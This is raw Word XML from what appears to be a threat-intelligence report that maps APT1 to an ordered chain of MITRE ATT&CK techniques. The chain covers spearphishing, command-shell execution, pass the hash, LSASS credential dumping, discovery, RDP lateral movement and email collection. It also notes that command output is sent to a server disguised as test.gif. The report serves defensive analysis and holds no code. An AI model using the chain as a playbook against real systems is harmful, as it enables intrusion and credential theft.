    <w:p w14:paraId="537FFA24" w14:textId="53D1D4BA" w:rsidR="00E17B7C" w:rsidRDefault="00327101" w:rsidP="0023637A">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E75A22">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Output of cmd.exe has been encoded and encrypted and is sent to the server as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>test.gif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> using an HTTP POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B30C995" w14:textId="1B6B2FB2" w:rsidR="00E17B7C" w:rsidRDefault="00E17B7C" w:rsidP="0023637A">
      <w:r>
        <w:t>Not mentioned in this attack but examples from the ATT&amp;CK group description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A118CFD" w14:textId="0E5AB123" w:rsidR="00E17B7C" w:rsidRDefault="00E17B7C" w:rsidP="0023637A"/>
    <w:p w14:paraId="484A3C7E" w14:textId="4C0DEFE6" w:rsidR="00E17B7C" w:rsidRPr="00A62C5F" w:rsidRDefault="00A62C5F" w:rsidP="0023637A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A62C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A62C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB934BB" w14:textId="51DA63FC" w:rsidR="00A62C5F" w:rsidRPr="00A62C5F" w:rsidRDefault="00A62C5F" w:rsidP="0023637A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A62C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A62C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2079E635" w14:textId="77777777" w:rsidR="00826DCD" w:rsidRDefault="00826DCD" w:rsidP="00826DCD"/>
    <w:p w14:paraId="7A281F7A" w14:textId="77777777" w:rsidR="00891095" w:rsidRDefault="00891095">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B09CF9" w14:textId="4D10AC10" w:rsidR="005E4168" w:rsidRDefault="005E4168" w:rsidP="005E4168">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc110935506"/>
      <w:bookmarkStart w:id="41" w:name="_Toc153480843"/>
      <w:r w:rsidRPr="009A05C9">
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>PT 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="584AC545" w14:textId="77777777" w:rsidR="002252F8" w:rsidRPr="005B4630" w:rsidRDefault="002252F8" w:rsidP="002252F8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc153480844"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="0D8EDFF9" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="0025199D" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0006 - APT1 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3313BF"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B895A61"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.002', 'T1588.001', 'T1585.002', 'T1584.001', 'T1583.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D2CD5"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DA8F2"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T1588.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996FCEB"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T1585.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Establish Accounts&gt;:Email Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40719545"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T1584.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Compromise Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60783FFF"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C01DE"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.001', 'T1566.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920482A"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T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F49DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>&lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F49DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F49DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D34AD"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A8249"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744E15A" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="00F16C9D" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F16C9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F16C9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885F385"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC1FB2"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8CEC0"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1550.002', 'T1036.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0627B"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T1550.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2EF481"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0766E151"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1003.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE9BD9" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="00713E7E" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D88E2"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1057', 'T1135', 'T1016', 'T1087.001', 'T1049', 'T1007']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4910A7"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r w:rsidRPr="00542E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00542E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00542E8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2710CC9B"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r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1135 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Share Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A862C8D"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r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1867F9B0" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="00713E7E" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1087.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E28DF5"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r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CD29B" w14:textId="77777777" w:rsidR="0025199D" w:rsidRPr="00713E7E" w:rsidRDefault="0025199D" w:rsidP="0025199D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00713E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED88602"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1550.002', 'T1021.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399E4C0"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T1550.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9746A"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423D81A"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1114.002', 'T1119', 'T1005', 'T1560.001', 'T1114.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26563B"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T1114.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0025199D">
        <w:rPr>
